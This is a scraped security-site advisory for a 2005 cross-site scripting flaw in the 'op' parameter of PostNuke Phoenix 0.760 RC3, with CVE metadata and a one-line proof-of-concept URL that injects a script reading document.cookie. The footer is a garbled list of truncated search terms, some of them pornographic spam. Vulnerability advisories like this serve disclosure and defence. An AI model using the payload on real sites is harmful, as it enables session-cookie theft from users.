about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PostNuke Phoenix OP Parameter Remote Cross-Site Scripting Vulnerability


Title PostNuke Phoenix OP Parameter Remote Cross-Site Scripting Vulnerability
Published 2005-04-08-12:00AM
Updated 2005-04-08-06:21PM
Class Input Validation Error
CVE   CAN-2005-1049
Remote  Yes
Local  No
Credit  dcrab <dcrab@hackerscenter.com> is credited with the discovery of this issue.
Vulnerable  PostNuke Development Team PostNuke Phoenix 0.760 RC3
Not Vulnerable  
Code   The following proof of concept is available:

http://www.example.com/user.php?op=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&module=NS-NewUser&POSTNUKESID=355776cfb622466924a7096d4471a480
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 20:20:35 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
proftp.c www.realse 3127 php 4.3.10 MxBB Porta www.realse www.ltdts. www.2khtar dzh2.mop.c t842t jnjnjnj SlimFTPd Adelphia . news for c Wwwsexphot noor sexe roll no 22 Www.worlds 18sex.com. XXX.IMEGE maxcpm.inf Indian gir download+w Www.sexani news for c Www.sexani phpBB por news for c www.parkwa www.Aishwa MUMTAZ_nob Sad wo.ju.rpgc maxcpm.inf AppServ+Op Hayden Pen mirc+6.16 sexs sexsy Http:/case www.liaoti vidio porn t121t sbcnnet.cn www.700xxx news for c www.chinab ww.xxx.g 3pic maxcpm.inf Sexanimati